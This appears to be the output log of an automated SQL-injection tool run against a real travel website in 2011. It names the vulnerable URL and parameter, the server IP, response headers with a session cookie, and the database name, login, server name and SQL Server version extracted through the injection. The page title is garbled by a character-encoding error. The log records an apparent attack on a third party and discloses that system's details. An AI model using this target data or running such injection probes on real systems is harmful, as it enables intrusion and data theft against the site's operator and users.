■漏洞信息:============================================================
 ・URL:http://www.travelmecca.net/web/goods/layout2/goods_view.asp?goods_type=%C5%D7%B8%B6&goods_area=%BA%CF%B9%CC&menu_id=95725&id=30315
 ・页面标题：脚急茄 面拜 飘贰喉皋墨 ⑻背荤翠荤⑻傍公楷荐⑻楷荐傈巩⑻海飘巢咯青⑻牢档瞒捞唱
 ・参数:goods_type=%C5%D7%B8%B6&goods_area=%BA%CF%B9%CC&menu_id=95725&id=30315
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:211.108.62.146
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 03 Apr 2011 15:38:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 21708
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAACDSQQQ=MKEFPHCAKDPEOFDMIFIEHECL; path=/
Cache-control: private



■数据库信息:============================================================
- 数据库名：Tour
- 用户名：netholdingsUser
- 版本：Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
	May  3 2005 23:18:38 
	Copyright (c) 1988-2003 Microsoft Corporation
	Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

- 服务器名：NS2
- 服务名：MSSQLSERVER
- 系统用户名：netholdingsUser

 ・当前用户权限：
获取用户权限失败！

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5
